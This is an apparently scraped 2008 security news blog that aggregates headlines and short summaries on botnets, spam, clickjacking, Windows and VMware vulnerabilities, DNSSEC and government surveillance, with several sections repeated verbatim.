The National Debt Counter, erected in 1989 when the U.S. debt was 'merely' a tiny $2.7 trillion, has been moving so much that it recently ran out of digits to display the ballooning figure: $10,150,603,734,720, or roughly $10.2 trillion, as of Saturday afternoon. To accommodate the extra '1,' the clock was hacked: the '1' from "$10.2" has been moved left to the LCD square once occupied solely by the digital dollar sign. A non-digital, improvised dollar sign has been pasted next to the '1.' It will be replaced in 2009 with a new clock able to track debt up to a quadrillion dollars, which is a '1' followed by 15 zeros
Goodbye Storm?
Spam from the Storm botnet has dried up. Is this the end of Storm?
October 10, 2008
The former king of spam, and perhaps the most discussed and studied botnet ever, seems to have gone away. Spam originating from the Storm botnet suddenly dried up in mid-September. Since that time we have not detected a single Storm spam in our traps.
The folks at sudosecure.net have also noticed the Storm subsidence, observing that surviving storm bot peers still communicate with each other, but that certain Storm hosts simply answer with "Go away, we're not home".
At its peak in mid 2007, we estimated Storm was responsible for some 20% of all spam . Storm’s spam attacks were high profile and distinctive. Its peer-to-peer communication model was revolutionary and it was quick to use the fast flux – rapidly changing DNS - to hide its hosts. However, following all the attention, and the targeting of Storm by Microsoft with its Malicious Software Removal Tool in September 2007 where some 280,000 PCs were cleaned in one hit, Storm became a much less effective beast.
So is this the end of Storm? Certainly, as a spam generator it has been a minor player for the best part of a year now, with other botnets namely Srizbi, Rustock, Pushdo, and Mega-D taking over as the spam heavies. Perhaps Storm is now obsolete, having been supplanted by a better botnet. Or maybe Storm’s owners are sitting back, avoiding attention and redesigning aspects of their creation. Only time will tell.
The Rise Of Anti-Spam Lawsuit Entrepreneurs
Cracking CAPTCHA: Another Russian Business
Fake Microsoft email contains "backdoor" virus
Angela Moscaritolo October 10, 2008
A fake email making the rounds seemingly comes from Microsoft, but actually contains a trojan.
Latest Product Reviews
PGP Whole Disk Encryption 9.9
October 04, 2008 5 out of 5 stars
Inside Operation Highlander: the NSA's Wiretapping of Americans Abroad
A top secret NSA wiretapping facility in Georgia accused of spying on Americans illegally was hastily staffed with inexperienced reservists in the months following September 11, where they worked under conflicting orders and with little supervision, according to three former workers at the spy complex.
"Nobody knew exactly what the heck we were doing," said a former translator for the project, code named Highlander, who spoke on condition of anonymity. "We were figuring out the rules as we were going along."
Chinese hackers gain access to World Bank
At least there seems to be evidence that two of the six major attacks originated from IP addresses inside of China
How to Hack RFID-enabled Credit Cards for $8
Published 10/6/2008
http://www.nationalcybersecurity.com/
Mixing in information protection
The perimeter might not be dead, but it needs a lot of help. Here's how to secure critical and regulated data when network defenses aren't enough.
Report: World Bank servers breached repeatedly
World Bank Hacked, Sensitive Data Exposed - 10/10/2008 5:10:00 PM
Hacked Web servers, a stolen administrative account, and lot of unanswered questions
Google allies with click-fraud-detection firm Click Forensics
Why some security pros hate SharePoint
Exploit code loose for six-month-old Windows bug
Over half of U.K. firms have lost data
U.S. proposes digital signing of DNS root zone file
Security experts for years have advocated the adoption of DNSSEC, but implementation has been patchy. The U.S. government has said it will use DNSSEC for its .gov domain. Country-code top-level domain operators in Sweden (.se), Brazil (.br), Puerto Rico (.pr) and Bulgaria (.bg) are also using DNSSEC. The operator of the .org TLD has also committed to the system, according to the Commerce Department.
Data Center Security Tools to Not Overlook
Endpoint technologies and virtualization software get a lot of ink these days, but here's a quick look at five other key security areas addressed by data-center tools.
Read more
Can you say "next year's budget?"
Fewer People Downloading Music Illegally
telegraph.co.uk — Fewer people are downloading music from the internet illegally because they are frightened about having their connections cut off, according to new research. More…
Oct 12, 9:05 amSix Essential Apple iPhone Security Tips
Security is a tech manager's top concern when it comes to mobile devices--here's how to use them to your advantage with minimal risk.
Oct 11, 2:18 pmVendors, Cops, Profs Team to Study Cybercrime
Tech vendors and the Secret Service are among those working with an evaluation of trends and best practices for security.
Oct 11, 6:00 amMicrosoft Readies Flood of Patches
The 11 patches include 4 critical fixes, plus updates to Windows, Office, and IE.
The National Debt Counter, erected in 1989 when the U.S. debt was 'merely' a tiny $2.7 trillion, has been moving so much that it recently ran out of digits to display the ballooning figure: $10,150,603,734,720, or roughly $10.2 trillion, as of Saturday afternoon. To accommodate the extra '1,' the clock was hacked: the '1' from "$10.2" has been moved left to the LCD square once occupied solely by the digital dollar sign. A non-digital, improvised dollar sign has been pasted next to the '1.' It will be replaced in 2009 with a new clock able to track debt up to a quadrillion dollars, which is a '1' followed by 15 zeros
Goodbye Storm?
Spam from the Storm botnet has dried up. Is this the end of Storm?
October 10, 2008
The former king of spam, and perhaps the most discussed and studied botnet ever, seems to have gone away. Spam originating from the Storm botnet suddenly dried up in mid-September. Since that time we have not detected a single Storm spam in our traps.
The folks at sudosecure.net have also noticed the Storm subsidence, observing that surviving storm bot peers still communicate with each other, but that certain Storm hosts simply answer with "Go away, we're not home".
At its peak in mid 2007, we estimated Storm was responsible for some 20% of all spam . Storm’s spam attacks were high profile and distinctive. Its peer-to-peer communication model was revolutionary and it was quick to use the fast flux – rapidly changing DNS - to hide its hosts. However, following all the attention, and the targeting of Storm by Microsoft with its Malicious Software Removal Tool in September 2007 where some 280,000 PCs were cleaned in one hit, Storm became a much less effective beast.
So is this the end of Storm? Certainly, as a spam generator it has been a minor player for the best part of a year now, with other botnets namely Srizbi, Rustock, Pushdo, and Mega-D taking over as the spam heavies. Perhaps Storm is now obsolete, having been supplanted by a better botnet. Or maybe Storm’s owners are sitting back, avoiding attention and redesigning aspects of their creation. Only time will tell.
The Rise Of Anti-Spam Lawsuit Entrepreneurs
Cracking CAPTCHA: Another Russian Business
Fake Microsoft email contains "backdoor" virus
Angela Moscaritolo October 10, 2008
A fake email making the rounds seemingly comes from Microsoft, but actually contains a trojan.
Latest Product Reviews
PGP Whole Disk Encryption 9.9
October 04, 2008 5 out of 5 stars
Inside Operation Highlander: the NSA's Wiretapping of Americans Abroad
A top secret NSA wiretapping facility in Georgia accused of spying on Americans illegally was hastily staffed with inexperienced reservists in the months following September 11, where they worked under conflicting orders and with little supervision, according to three former workers at the spy complex.
"Nobody knew exactly what the heck we were doing," said a former translator for the project, code named Highlander, who spoke on condition of anonymity. "We were figuring out the rules as we were going along."
Chinese hackers gain access to World Bank
At least there seems to be evidence that two of the six major attacks originated from IP addresses inside of China
How to Hack RFID-enabled Credit Cards for $8
Published 10/6/2008
http://www.nationalcybersecurity.com/
Mixing in information protection
The perimeter might not be dead, but it needs a lot of help. Here's how to secure critical and regulated data when network defenses aren't enough.
Friday, October 10, 2008
Security News Feed Friday 10/10/08
Windows 7 UAC, the Evolution
Microsoft investigates exploit reports for Windows flaw
Dan Kaplan October 10, 2008
Attackers have posted public exploit code for a zero-day Windows vulnerability that could result in privilege escalation.
Microsoft set to deliver 11 patches next week
Dan Kaplan October 09, 2008
Microsoft on Thursday announced plans to push out 11 fixes in next week's security update.
Iowa ISP owner wins $236 million spam judgment
Dan Kaplan October 09, 2008
The owner of a small Iowan ISP has been battling spammers for years. His most recent victory came in the form of a $236 million judgment.
10,000 LinkedIn users targeted in spear phishing attack
Angela Moscaritolo October 09, 2008
A LinkedIn "spear phishing" email scam loaded malicious software to steal usernames and passwords.
Prices for stolen information plummet
Dan Raywood October 09, 2008
The black-market price for stolen credit and debit card details has dropped to as little as $1.50, according to a newspaper investigation.
Mac OS X Patch Day: 40 security flaws fixed
Ryan Naraine: Apple has shipped another whopper of a patch to cover a total of 40 documented vulnerabilities affecting the Mac OS X ecosystem.
NSA Abused Wiretap Rights: Intercepted, Shared Private Calls Of Americans
from the funny-how-that-works dept
American Citizen Detained At Border Due To Drawing Of An SUV
from the think-how-much-worse-it-could-be dept
If you want to understand why we're so troubled by the ACTA treaty that many nations are working on in secret, we just need to look at a story highlighted recently at Boing Boing about an American woman who was detained for a while at the US-Canadian border because she had a drawing of an SUV. The customs officials accused her of being an industrial spy and copyright infringer. In actuality, she's a professor and artist, who was doing an art project involving an SUV.
Cyber Credit Card Thieves Payment Processor of Choice is Western Union By Grey McKenzie 10/7/2008
Free Cyber Security Awareness Materials From ISC By Grey McKenzie 10/7/2008
Romanian pleads guilty to phishing-related charges
A Romanian man pleaded guilty earlier this week to charges related to possession of stolen credit...
U.S. gov't proposes digital signing of DNS root zone file
The U.S. government is soliciting input on a way to make the Internet's addressing system less...
Saudi-owned TV website hit by cyber attackAFP - 34 minutes ago
DUBAI (AFP) - Computer hackers claiming to be Shiite shut down the website of Saudi-owned satellite channel Al-Arabiya on Friday, a month after Iran reported similar attacks on many of its websites by hardline Sunnis.
Update 1: Microsoft Security Advisory 951306
Posted Thursday, October 09, 2008 4:00 PM by MSRCTEAM
Hello, Bill here,
I wanted to let you know that we have just updated Microsoft Security Advisory (951306).
Exploit code has been published on the Internet for the vulnerability addressed by this Advisory. Our investigation has shown that it does not affect customers who have applied the workarounds listed in the Advisory.
Remote Workers Care About IT Security -- Really
A new survey finds that mobile users actually do make sure to use secure Internet and Wi-Fi connections, they love IT for helping keep them on the go, and they'd rather live without their car than Internet connectivity.
Fake Microsoft Update Email
When the Hackers Hack Back
Data Mining for Terrorists Doesn't Work
According to a massive report from the National Research Council, data mining for terrorists doesn't work.
CUPS Multiple Vulnerabilities
Issued 10 hours ago. // Moderately critical // From local network // 436 viewsSome vulnerabilities have been reported in CUPS, which potentially can be exploited by malicious people to compromise a vulnerable system.
Posted at 01:33 PM ET, 10/ 9/2008
Spam Volumes Plummet After Atrivo Shutdown
Security Fix has spilled quite a bit of digital ink chronicling the demise of Atrivo (a.k.a. "Intercage"), a now-defunct Northern Calif. based Internet service provider that served as home base for a large number of cyber criminal operations. Happily, data released this week about a short-lived but precipitous decline in the level of badness online after Atrivo was shut down illustrates just how bad Atrivo was.
Posted by Brian Krebs Permalink
Interorganizational wrangling begins as .gov studies DNS fix
In the wake of recent DNS hijacking hacks, a number of top-level Internet domains have deployed DNSSEC. Now, the US Commerce Department is requesting comments on proposals to roll it out for the root DNS servers.
October 09, 2008 - 12:48PM CT - by John Timmer
Users, Enterprises Pay for Poor Privacy Policies, Study Says - 10/7/2008 4:10:00 PM
Research paper seeks to quantify loss of time spent reading confusing, overwritten privacy policies
Microsoft investigates exploit reports for Windows flaw
Dan Kaplan October 10, 2008
Attackers have posted public exploit code for a zero-day Windows vulnerability that could result in privilege escalation.
Microsoft set to deliver 11 patches next week
Dan Kaplan October 09, 2008
Microsoft on Thursday announced plans to push out 11 fixes in next week's security update.
Iowa ISP owner wins $236 million spam judgment
Dan Kaplan October 09, 2008
The owner of a small Iowan ISP has been battling spammers for years. His most recent victory came in the form of a $236 million judgment.
10,000 LinkedIn users targeted in spear phishing attack
Angela Moscaritolo October 09, 2008
A LinkedIn "spear phishing" email scam loaded malicious software to steal usernames and passwords.
Prices for stolen information plummet
Dan Raywood October 09, 2008
The black-market price for stolen credit and debit card details has dropped to as little as $1.50, according to a newspaper investigation.
Mac OS X Patch Day: 40 security flaws fixed
Ryan Naraine: Apple has shipped another whopper of a patch to cover a total of 40 documented vulnerabilities affecting the Mac OS X ecosystem.
NSA Abused Wiretap Rights: Intercepted, Shared Private Calls Of Americans
from the funny-how-that-works dept
American Citizen Detained At Border Due To Drawing Of An SUV
from the think-how-much-worse-it-could-be dept
If you want to understand why we're so troubled by the ACTA treaty that many nations are working on in secret, we just need to look at a story highlighted recently at Boing Boing about an American woman who was detained for a while at the US-Canadian border because she had a drawing of an SUV. The customs officials accused her of being an industrial spy and copyright infringer. In actuality, she's a professor and artist, who was doing an art project involving an SUV.
Cyber Credit Card Thieves Payment Processor of Choice is Western Union By Grey McKenzie 10/7/2008
Free Cyber Security Awareness Materials From ISC By Grey McKenzie 10/7/2008
Romanian pleads guilty to phishing-related charges
A Romanian man pleaded guilty earlier this week to charges related to possession of stolen credit...
U.S. gov't proposes digital signing of DNS root zone file
The U.S. government is soliciting input on a way to make the Internet's addressing system less...
Saudi-owned TV website hit by cyber attackAFP - 34 minutes ago
DUBAI (AFP) - Computer hackers claiming to be Shiite shut down the website of Saudi-owned satellite channel Al-Arabiya on Friday, a month after Iran reported similar attacks on many of its websites by hardline Sunnis.
Update 1: Microsoft Security Advisory 951306
Posted Thursday, October 09, 2008 4:00 PM by MSRCTEAM
Hello, Bill here,
I wanted to let you know that we have just updated Microsoft Security Advisory (951306).
Exploit code has been published on the Internet for the vulnerability addressed by this Advisory. Our investigation has shown that it does not affect customers who have applied the workarounds listed in the Advisory.
Remote Workers Care About IT Security -- Really
A new survey finds that mobile users actually do make sure to use secure Internet and Wi-Fi connections, they love IT for helping keep them on the go, and they'd rather live without their car than Internet connectivity.
Fake Microsoft Update Email
When the Hackers Hack Back
Data Mining for Terrorists Doesn't Work
According to a massive report from the National Research Council, data mining for terrorists doesn't work.
CUPS Multiple Vulnerabilities
Issued 10 hours ago. // Moderately critical // From local network // 436 viewsSome vulnerabilities have been reported in CUPS, which potentially can be exploited by malicious people to compromise a vulnerable system.
Posted at 01:33 PM ET, 10/ 9/2008
Spam Volumes Plummet After Atrivo Shutdown
Security Fix has spilled quite a bit of digital ink chronicling the demise of Atrivo (a.k.a. "Intercage"), a now-defunct Northern Calif. based Internet service provider that served as home base for a large number of cyber criminal operations. Happily, data released this week about a short-lived but precipitous decline in the level of badness online after Atrivo was shut down illustrates just how bad Atrivo was.
Posted by Brian Krebs Permalink
Interorganizational wrangling begins as .gov studies DNS fix
In the wake of recent DNS hijacking hacks, a number of top-level Internet domains have deployed DNSSEC. Now, the US Commerce Department is requesting comments on proposals to roll it out for the root DNS servers.
October 09, 2008 - 12:48PM CT - by John Timmer
Users, Enterprises Pay for Poor Privacy Policies, Study Says - 10/7/2008 4:10:00 PM
Research paper seeks to quantify loss of time spent reading confusing, overwritten privacy policies
Wednesday, October 8, 2008
Security News Feed Wednesday 10/08/08
Great write-up on Capture-the-Flag event across three nights at a recent convention. Written up by one of the guys from Pauldotcom.com security podcast.
http://pauldotcom.com/2008/10/ice2-games-lessons-learned-fro.html
Palin email intruder indicted, faces up to five years in prison
Dan Kaplan October 08, 2008
A 20-year-old Tennessee man has been indicted on charges he accessed GOP vice presidential candidate Sarah Palin's Yahoo email account without permission.
China's Eye on Web Chatter
By Erica NaoneMonday, October 06, 2008
Poorly protected files reveal a massive surveillance scheme.
China’s Cyber Police Map (with links)
(Cool map at the site of China's web police locations)
Recently I’ve been interested in China’s Cyber Police and how they function. Nothing worth sharing yet but some of our readers are Chinese linguist and might find this map and links to cyber police websites interesting.
On a side note, many of the web addresses for Chinese cyber police stations include the number 110. For example, the Shandong Cyber Police web address is http://www.sd110.gov.cn/. In China, as well as Taiwan, 110 is similar to the 911 emergency number. However in China, 110 is the exclusive contact number for the police. Other emergency services, such as the fire department, use different contact numbers. The fire department’s number is 119.
Chinese Cyber Police links just below map.
Israeli Super Hacker Ehud Tenenbaum "The Analyzer" May Be Extradited To US
http://www.nationalcybersecurity.com/blogs/843/Israeli-Super-Hacker-Ehud-Tenenbaum-The-Analyzer-May-Be-Extradited-To-US.html
Canada will be asked to extradite computer hacker Ehud Tenenbaum "The Analyzer" for alleged theft of millions of dollars.
According to the US Tenunbaum was one of the masterminds who hacked into financial institutions in Russia, Turkey, Holland, Sweden, Germany and other countries.
Last month he was arrested in Canada for cyber theft from a local bank.He was about to be released on $30,000 bail until just before his release, a new arrest order issued in connection with the U.S. extradition request held him in prison.
Firefox extension blocks dangerous Web attack
A popular free security tool for the Firefox browser has been upgraded to block one of the most dangerous and troubling security problems facing the Web today.
NoScript is a small application that integrates into Firefox. It blocks scripts in programming languages such as JavaScript and Java from executing on untrusted Web pages. The scripts could be used to launch an attack on a PC.
The latest release of NoScript, version 1.8.2.1, will stop so-called "clickjacking," where a person browsing the Web clicks on a malicious, invisible link without realizing it, said Giorgio Maone, an Italian security researcher who wrote and maintains the program.
Clickjacking has been known for several years but is drawing attention again after two security researchers, Robert Hansen and Jeremiah Grossman, warned last month of new scenarios that could compromise a person's privacy or even worse, steal money from a bank account.
New and Updated VMware Security Advisories for VirtualCenter, ESXi, ESX, VCB and VMware Hosted Products
Today, VMware released a new version of VirtualCenter, VC2.5 Update 3, a new version of Virtual Consolidated Backup, VCB 1.1 Update 1, and patches for ESXi and ESX 3.5. These and the recently released versions of VMware's hosted products and patches for ESX 3.0.1, 3.0.2 and 3.0.3 address several security issues. The issues are described in a new and an updated security advisory published today.One of the fixed security issues is a privilege escalation on certain 64-bit guest operating systems, CVE-2008-4279. It allows an attacker with a login account on a guest operating system to elevate their privileges on that system. The flaw doesn't allow for compromising the host system. The other security issues involve password disclosure and an update to JRE.
Symantec to acquire MessageLabs for $695 million
Angela Moscaritolo October 08, 2008
With its acquisition of MessageLabs, a British online messaging and web security services provider, Symantec hopes to expand its software-as-a-service offerings.
European hackers charged with DDoS attacks in the U.S.
Angela Moscaritolo October 07, 2008
Two European men have been charged with hacking U.S. retail websites and causing more than $400,000 in damage through a series of distributed denial-of-service attacks in 2003.
Stolen McCain party laptop had minimal data safeguards
Dan Kaplan October 06, 2008
A laptop containing "strategic" GOP data was stolen from the Kansas City field office for Sen. John McCain -- but the machine lacked encryption.
Study: Hotel network security lacking
Angela Moscaritolo October 06, 2008
Hotel guests across the country could be connecting their laptops to an insecure connection, a new study concludes.
Dutch to MBTA: Sorry CharlieCard. Your crypto is crap-o
Two months after the Massachussetts Bay Transit Authority went to court to stop US students from talking about weaknesses in the CharlieCard RFID authentication system, researchers in the Netherlands have published evidence that the MIFARE technology that underlies Charlie (and many other mass transits) is fundamentally flawed.
October 08, 2008 - 06:20AM CT - by Joel Hruska
Clickjacking
Good Q&A on clickjacking:
In plain English, clickjacking lets hackers and scammers hide malicious stuff under the cover of the content on a legitimate site. You know what happens when a carjacker takes a car? Well, clickjacking is like that, except that the click is the car.
"Clickjacking" is a stunningly sexy name, but the vulnerability is really just a variant of cross-site scripting. We don't know how bad it really is, because the details are still being withheld. But the name alone is causing dread.
Posted on October 6, 2008 at 1:45 PM
Spammers Favor Obama Over McCain 7 to 1
http://voices.washingtonpost.com/securityfix/2008/10/spammers_favor_obama_over_mcca.html
Report: Data Breaches Expose About 30M Records in '08
http://voices.washingtonpost.com/securityfix/2008/10/516_data_breaches_in_2008_expo.html
Privacy survey urged for counterterror programsNews Brief, 2008-10-07
The National Research Council calls for all U.S. agencies to evaluate their programs based on how effective they are and whether they protect privacy.
TiVo Wins Appeal On Patents For Pause, Ffwd, Rwd
After years of wrangling, TiVo has won its day in court against Dish Network, formerly known as the EchoStar, when the Supreme Court declined to take up Dish Network's appeal, forcing the satellite television company to pay $104 million in damages. According to the article, 'TiVo originally won a patent infringement case in 2004 against Dish, which was then named EchoStar Communications. It charged that Dish illegally copied its technology, which allows people to pause, rewind, and record live television on digital video recorders.' Despite an injunction, Dish continued distributing its set-top boxes in the belief that the work-around they had implemented avoided infringing TiVo's patents. Now the case goes back to the lower court for review to determine if they did indeed steer clear of those patents.
New Bill To Rein In DHS Laptop Seizures
The Travelers Privacy Protection Act, a bill written by US Senators Russ Feingold, D-Wis., and Maria Cantwell, D-Wash., and Rep. Adam Smith, D-Wash., would allow border agents to search electronic devices only if they had reasonable suspicions of wrongdoing. In addition, the legislation would limit the length of time that a device could be out of its owner's possession to 24 hours, after which the search becomes a seizure, requiring probable cause.
Sequoia's Optical Scan Vote Counting Machines Giving Different Results Every Time
from the well-that's-reassuring dept
Supreme Court Hears Arguments on Bad Police Data
The Supreme Court hears arguments on the implications of police acting on their own inaccurate information. Police suspected that Herring, an Alabama resident, had a warrant. The police checked county records and finding no warrant checked a neighboring county which in error reported an outstanding warrant. Upon a search of Herring, as a result of the false warrant claim, he was found to be in possession of controlled substances. The case seeks a ruling from the court on whether the police can be insulated because they acted on erroneous information from a police county clerk. Criminal record database errors are further complicated by the practice of interlinking law enforcement databases.
Supreme Court Mull Whether Bad Databases Make for Illegal Searches, Wired News, October 4, 2008
Domaincontrol (GoDaddy) Nameservers DNS Poisoning
We knew it would be happening for the forseeable future, until some version of SecDNS is implemented.
Adobe Flash Player "Clickjacking" Security Bypass Vulnerability
Issued 10 hours ago. //
A vulnerability has been reported in Adobe Flash Player, which can be exploited by malicious people to bypass certain security restrictions and disclose potentially sensitive information.
'Clickjackers' could hijack webcams, microphones, Adobe warns
Why Security Pros Hate Microsoft SharePoint (and What to Do About It)
Microsoft's SharePoint collaboration platform is all the rage in today's business world, especially since third parties gained the ability to plug security holes. But managing it can still be a nightmare for IT security shops.
Read more
Court orders spammers to pay $236M to Iowa ISP
Shell fingers IT contractor in theft of employee data
New health-care privacy laws heighten need for HIPAA compliance in California
http://pauldotcom.com/2008/10/ice2-games-lessons-learned-fro.html
Palin email intruder indicted, faces up to five years in prison
Dan Kaplan October 08, 2008
A 20-year-old Tennessee man has been indicted on charges he accessed GOP vice presidential candidate Sarah Palin's Yahoo email account without permission.
China's Eye on Web Chatter
By Erica NaoneMonday, October 06, 2008
Poorly protected files reveal a massive surveillance scheme.
China’s Cyber Police Map (with links)
(Cool map at the site of China's web police locations)
Recently I’ve been interested in China’s Cyber Police and how they function. Nothing worth sharing yet but some of our readers are Chinese linguist and might find this map and links to cyber police websites interesting.
On a side note, many of the web addresses for Chinese cyber police stations include the number 110. For example, the Shandong Cyber Police web address is http://www.sd110.gov.cn/. In China, as well as Taiwan, 110 is similar to the 911 emergency number. However in China, 110 is the exclusive contact number for the police. Other emergency services, such as the fire department, use different contact numbers. The fire department’s number is 119.
Chinese Cyber Police links just below map.
Israeli Super Hacker Ehud Tenenbaum "The Analyzer" May Be Extradited To US
http://www.nationalcybersecurity.com/blogs/843/Israeli-Super-Hacker-Ehud-Tenenbaum-The-Analyzer-May-Be-Extradited-To-US.html
Canada will be asked to extradite computer hacker Ehud Tenenbaum "The Analyzer" for alleged theft of millions of dollars.
According to the US Tenunbaum was one of the masterminds who hacked into financial institutions in Russia, Turkey, Holland, Sweden, Germany and other countries.
Last month he was arrested in Canada for cyber theft from a local bank.He was about to be released on $30,000 bail until just before his release, a new arrest order issued in connection with the U.S. extradition request held him in prison.
Firefox extension blocks dangerous Web attack
A popular free security tool for the Firefox browser has been upgraded to block one of the most dangerous and troubling security problems facing the Web today.
NoScript is a small application that integrates into Firefox. It blocks scripts in programming languages such as JavaScript and Java from executing on untrusted Web pages. The scripts could be used to launch an attack on a PC.
The latest release of NoScript, version 1.8.2.1, will stop so-called "clickjacking," where a person browsing the Web clicks on a malicious, invisible link without realizing it, said Giorgio Maone, an Italian security researcher who wrote and maintains the program.
Clickjacking has been known for several years but is drawing attention again after two security researchers, Robert Hansen and Jeremiah Grossman, warned last month of new scenarios that could compromise a person's privacy or even worse, steal money from a bank account.
New and Updated VMware Security Advisories for VirtualCenter, ESXi, ESX, VCB and VMware Hosted Products
Today, VMware released a new version of VirtualCenter, VC2.5 Update 3, a new version of Virtual Consolidated Backup, VCB 1.1 Update 1, and patches for ESXi and ESX 3.5. These and the recently released versions of VMware's hosted products and patches for ESX 3.0.1, 3.0.2 and 3.0.3 address several security issues. The issues are described in a new and an updated security advisory published today.One of the fixed security issues is a privilege escalation on certain 64-bit guest operating systems, CVE-2008-4279. It allows an attacker with a login account on a guest operating system to elevate their privileges on that system. The flaw doesn't allow for compromising the host system. The other security issues involve password disclosure and an update to JRE.
Symantec to acquire MessageLabs for $695 million
Angela Moscaritolo October 08, 2008
With its acquisition of MessageLabs, a British online messaging and web security services provider, Symantec hopes to expand its software-as-a-service offerings.
European hackers charged with DDoS attacks in the U.S.
Angela Moscaritolo October 07, 2008
Two European men have been charged with hacking U.S. retail websites and causing more than $400,000 in damage through a series of distributed denial-of-service attacks in 2003.
Stolen McCain party laptop had minimal data safeguards
Dan Kaplan October 06, 2008
A laptop containing "strategic" GOP data was stolen from the Kansas City field office for Sen. John McCain -- but the machine lacked encryption.
Study: Hotel network security lacking
Angela Moscaritolo October 06, 2008
Hotel guests across the country could be connecting their laptops to an insecure connection, a new study concludes.
Dutch to MBTA: Sorry CharlieCard. Your crypto is crap-o
Two months after the Massachussetts Bay Transit Authority went to court to stop US students from talking about weaknesses in the CharlieCard RFID authentication system, researchers in the Netherlands have published evidence that the MIFARE technology that underlies Charlie (and many other mass transits) is fundamentally flawed.
October 08, 2008 - 06:20AM CT - by Joel Hruska
Clickjacking
Good Q&A on clickjacking:
In plain English, clickjacking lets hackers and scammers hide malicious stuff under the cover of the content on a legitimate site. You know what happens when a carjacker takes a car? Well, clickjacking is like that, except that the click is the car.
"Clickjacking" is a stunningly sexy name, but the vulnerability is really just a variant of cross-site scripting. We don't know how bad it really is, because the details are still being withheld. But the name alone is causing dread.
Posted on October 6, 2008 at 1:45 PM
Spammers Favor Obama Over McCain 7 to 1
http://voices.washingtonpost.com/securityfix/2008/10/spammers_favor_obama_over_mcca.html
Report: Data Breaches Expose About 30M Records in '08
http://voices.washingtonpost.com/securityfix/2008/10/516_data_breaches_in_2008_expo.html
Privacy survey urged for counterterror programsNews Brief, 2008-10-07
The National Research Council calls for all U.S. agencies to evaluate their programs based on how effective they are and whether they protect privacy.
TiVo Wins Appeal On Patents For Pause, Ffwd, Rwd
After years of wrangling, TiVo has won its day in court against Dish Network, formerly known as the EchoStar, when the Supreme Court declined to take up Dish Network's appeal, forcing the satellite television company to pay $104 million in damages. According to the article, 'TiVo originally won a patent infringement case in 2004 against Dish, which was then named EchoStar Communications. It charged that Dish illegally copied its technology, which allows people to pause, rewind, and record live television on digital video recorders.' Despite an injunction, Dish continued distributing its set-top boxes in the belief that the work-around they had implemented avoided infringing TiVo's patents. Now the case goes back to the lower court for review to determine if they did indeed steer clear of those patents.
New Bill To Rein In DHS Laptop Seizures
The Travelers Privacy Protection Act, a bill written by US Senators Russ Feingold, D-Wis., and Maria Cantwell, D-Wash., and Rep. Adam Smith, D-Wash., would allow border agents to search electronic devices only if they had reasonable suspicions of wrongdoing. In addition, the legislation would limit the length of time that a device could be out of its owner's possession to 24 hours, after which the search becomes a seizure, requiring probable cause.
Sequoia's Optical Scan Vote Counting Machines Giving Different Results Every Time
from the well-that's-reassuring dept
Supreme Court Hears Arguments on Bad Police Data
The Supreme Court hears arguments on the implications of police acting on their own inaccurate information. Police suspected that Herring, an Alabama resident, had a warrant. The police checked county records and finding no warrant checked a neighboring county which in error reported an outstanding warrant. Upon a search of Herring, as a result of the false warrant claim, he was found to be in possession of controlled substances. The case seeks a ruling from the court on whether the police can be insulated because they acted on erroneous information from a police county clerk. Criminal record database errors are further complicated by the practice of interlinking law enforcement databases.
Supreme Court Mull Whether Bad Databases Make for Illegal Searches, Wired News, October 4, 2008
Domaincontrol (GoDaddy) Nameservers DNS Poisoning
We knew it would be happening for the forseeable future, until some version of SecDNS is implemented.
Adobe Flash Player "Clickjacking" Security Bypass Vulnerability
Issued 10 hours ago. //
A vulnerability has been reported in Adobe Flash Player, which can be exploited by malicious people to bypass certain security restrictions and disclose potentially sensitive information.
'Clickjackers' could hijack webcams, microphones, Adobe warns
Why Security Pros Hate Microsoft SharePoint (and What to Do About It)
Microsoft's SharePoint collaboration platform is all the rage in today's business world, especially since third parties gained the ability to plug security holes. But managing it can still be a nightmare for IT security shops.
Read more
Court orders spammers to pay $236M to Iowa ISP
Shell fingers IT contractor in theft of employee data
New health-care privacy laws heighten need for HIPAA compliance in California
Friday, October 3, 2008
Security News Feed Friday 10/3/08
Grand jury indicts two Europeans over denial-of-service attacks in 2003 A federal grand jury has indicted two European men for allegedly orchestrating denial-of-service attacks against a pair of U.S.-based Web sites in 2003. Read more...
Lawyers want Windows Update used to push 'Vista Capable' lawsuit notices
Vendors rush to fix bug that could crash Internet systems
Researcher finds evidence of massive site compromise
Digs up cache of 200,000 site credentials for Fortune 500 firms, weapons makers, governments
CSRF Flaws Found on Major Websites - 9/29/2008 5:35:00 PM Princeton University researchers reveal four sites with cross-site request forgery flaws and unveil tools to protect against these attacks
California makes it a crime to 'skim' RFID tags
Sysadmin admits stealing computers, office equipment from Navy
California outlaws RFID card skimming
Chinese Skype spies on users, researcher says
Frustrated researcher details iPhone security bugs
Many computer users lack basic security precautions, survey says
How to Root Out Bots in Your Network - 10/2/2008 5:40:00 PM
Expert gives tips on how to detect and remediate internal botnet infestations
Why Risk Management Doesn't Work - 10/2/2008 3:45:00 PM
Two new studies challenge current wisdom about calculating an enterprise's security risk -- and recommend rethinking the process
House.gov Still Plagued by E-mail Deluge
A glut of e-mail from constituents and special interest groups continued to pose problems for the Web sites for members of the U.S. House of Representatives on Thursday, as millions of Americans attempt to voice their opinions on the financial bailout package the day before an expected vote on the measure.
Second bill tackles laptop border searchesNews Brief, 2008-10-02
Three U.S. lawmakers propose a law to limit the searches of laptops or other electronic devices to cases where customs agents have reasonable suspicion of illegal activity.
Credit card processors finally get clue, will ban WEP
Credit card processors have finally realized what security experts have known since 2001: WEP is next to worthless as a wireless security protocol, and they're finally going its use in credit card processing systems—but not until mid-2010. The use of WEP was a major factor in the largest consumer data theft ever.
October 03, 2008 - 11:45AM CT - by Jacqui Cheng
Livefilestore URLs used in spamOctober 1, 2008
Spammers are using files hosted on livefilestore.com to redirect users to suspect web pages.
Judge Won't Allow Researchers To Reveal Report On E-Voting Machines
Artemis Backstage #1: Malware Mapping
News about the Artemis project has been out for a little while. As the rollout continues we want to post some of juicy backstage gossip here, making you some of the first people to see this outside of the core project team!
If you’ve not heard about the Artemis technology yet, it’s our “in-the-cloud”-based malware detection; head over to the McAfee Artemis micro-site. I highly recommend the podcast (hidden on the right-hand side) as my colleague Dimitry Gryaznov outtalks our communications guru Dave Marcus.
One of the things Artemis provides to researchers is very clear telemetry on active malware campaigns, and I want to share a few interesting examples. All the “measles maps” below show a one-day period and were all taken at the same time earlier today.
Cybergang moles steal company data
Dan Raywood October 02, 2008
Criminal gangs have been placing staff members in companies to operate as moles, an internet security expert said.
Wireless at Fiber Speeds
By Kate GreeneFriday, October 03, 2008
New millimeter-wave technology sends data at 10 gigabits per second.
